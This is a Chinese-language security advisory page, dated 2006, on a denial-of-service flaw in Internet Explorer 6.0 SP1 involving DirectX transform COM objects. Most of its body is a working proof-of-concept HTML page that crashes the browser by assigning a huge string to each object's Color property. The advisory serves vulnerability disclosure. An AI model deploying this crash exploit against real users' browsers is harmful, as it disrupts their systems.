 |
Microsoft Internet Explorer多个COM对象颜色属性拒绝服务漏洞 |
|
|
| Microsoft Internet Explorer多个COM对象颜色属性拒绝服务漏洞 |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-26 14:59:21 |
|
2006-8-22
发布日期:2006-08-21
更新日期:2006-08-22
受影响系统:
Microsoft Internet Explorer 6.0 SP1
描述:
BUGTRAQ ID: 19640
Internet Explorer是微软发布的非常流行的WEB浏览器。
Internet Explorer在处理多个COM对象(dxtmsft.dll/dxtmsft3.dll)的颜色属性输入方式时,如果将颜色属性设置为超长字符串的话,就会导致Internet Explorer崩溃。
<*来源:XSec (http://www.xsec.org)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=115618755813695&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! =============== Color.htm start ================
<!--
/ / Internet Explorer Multiple COM Object Color Property DoS Vulnerability
/ / tested on Windows 2000 SP4/XP SP2
/ / http://www.xsec.org
/ / nop (nop#xsec.org)
--!>
< html>
< head>
< title>< /title>
< /head>
< /body>
< script>
var i =0;
var Objects = new Array(
/ / CLSID: {3A04D93B-1EDD-4f3f-A375-A03EC19572C4}
/ / Info: MaskFilter
/ / ProgID: DXImageTransform.Microsoft.MaskFilter.1
/ / InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.MaskFilter.1",
/ / CLSID: {421516C1-3CF8-11D2-952A-00C04FA34F05}
/ / Info: Chroma
/ / ProgID: DXImageTransform.Microsoft.Chroma.1
/ / InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.Chroma.1",
/ / CLSID: {9F8E6421-3D9B-11D2-952A-00C04FA34F05}
/ / Info: Glow
/ / ProgID: DXImageTransform.Microsoft.Glow.1
/ / InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.Glow.1",
/ / CLSID: {ADC6CB86-424C-11D2-952A-00C04FA34F05}
/ / Info: DropShadow
/ / ProgID: DXImageTransform.Microsoft.DropShadow.1
/ / InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.DropShadow.1",
/ / CLSID: {E71B4063-3E59-11D2-952A-00C04FA34F05}
/ / Info: Shadow
/ / ProgID: DXImageTransform.Microsoft.Shadow.1
/ / InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.Shadow.1",
/ / CLSID: {8241F015-84D3-11d2-97E6-0000F803FF7A}
/ / Info: Shapes
/ / ProgID: DX3DTransform.Microsoft.Shapes.1
/ / InprocServer32: C:\WINNT\system32\dxtmsft3.dll
"DX3DTransform.Microsoft.Shapes.1",
null
);
var b = "AAAA";
while(b.length < 0x2000000)
{
b += b;
}
while(Objects[i])
{
var a = null;
window.status = "Create Object " + Objects[i] + "...";
try { a = new ActiveXObject(Objects[i]); } catch(e){}
if(a)
{
window.status = "Try Set " + Objects[i] + ".Color ...";
try { a.Color = b;} catch(e){}
}
i++;
}
window.status = "failed!";
< /script >
< /body >
< /html >
=============== Color.htm end ==================
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp
|
|
| 文章录入:admin 责任编辑:admin |
|
|
上一篇文章: Microsoft Internet Explorer畸形HTML解析拒绝服务漏洞发布
下一篇文章: PocketExpense Pro绕过数据访问认证漏洞 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
